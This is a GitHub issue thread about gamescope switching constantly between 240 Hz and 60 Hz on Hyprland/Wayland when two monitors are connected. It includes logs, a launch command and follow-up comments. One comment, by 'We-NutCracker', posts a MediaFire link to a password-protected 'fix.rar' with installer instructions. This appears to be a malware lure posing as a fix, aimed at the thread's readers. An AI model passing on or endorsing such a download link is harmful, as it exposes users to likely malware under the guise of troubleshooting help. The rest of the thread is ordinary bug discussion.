### ISSUE TITLE
Gamescope keeps switching refresh rates when two monitors of different refresh rates are connected.

### ISSUE THREAD

**Issue by zeptic99** [ValveSoftware/gamescope#1491]
This issue persists on wayland (hyprland) and when two of my monitors, of different refresh rates are connected. Gamescope seems to be confused as to what refresh rate it should be running at, resulting in constant changing of the refresh rate, causing noticeable stutters in game. This happens both in native and proton games. When I disconnect my second monitor, that is the 60hz monitor, the issue is resolved. However, this is not a viable fix for me as I do indeed, enjoy using both of my monitors.

This issue does not exist in X11. However, I have spent countless hours configuring hyprland to my liking, and enjoy using it a lot. I do not want to switch back to X11.

Below provided are console logs, and the command I use to run gamescope.

Console logs:
```
[gamescope] [Info]  xdg_backend: Changed refresh to: 239.761hz
[gamescope] [Warn]  xwm: got the same buffer committed twice, ignoring.
[gamescope] [Info]  xdg_backend: Changed refresh to: 60.000hz
[gamescope] [Info]  xdg_backend: Changed refresh to: 239.761hz
[gamescope] [Info]  xdg_backend: Changed refresh to: 60.000hz
[gamescope] [Info]  xdg_backend: Changed refresh to: 239.761hz
[gamescope] [Info]  xdg_backend: Changed refresh to: 60.000hz
[gamescope] [Info]  xdg_backend: Changed refresh to: 239.761hz
[gamescope] [Info]  xdg_backend: Changed refresh to: 60.000hz
[gamescope] [Info]  xdg_backend: Changed refresh to: 239.761hz
```

Gamescope launch command:
```
MANGOHUD_CONFIGFILE=$HOME/.config/MangoHud/MangoHud.conf vblank_mode=0 ENABLE_GAMESCOPE_WSI=1 WAYLAND_DISPLAY=wayland-1 gamescope -O DP-1 --prefer-vk-device 8086:56a5 -W 1920 -H 1080 -h 1080 -w 1920 -f --force-grab-cursor --mangoapp
```

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by zeptic99** [comment]
This has been fixed with the latest hyrpland-git update.

**Comment by TheArcaneBrony** [comment]
Issue affects Gnome on openSUSE Tumbleweed. Probably worth re-opening?
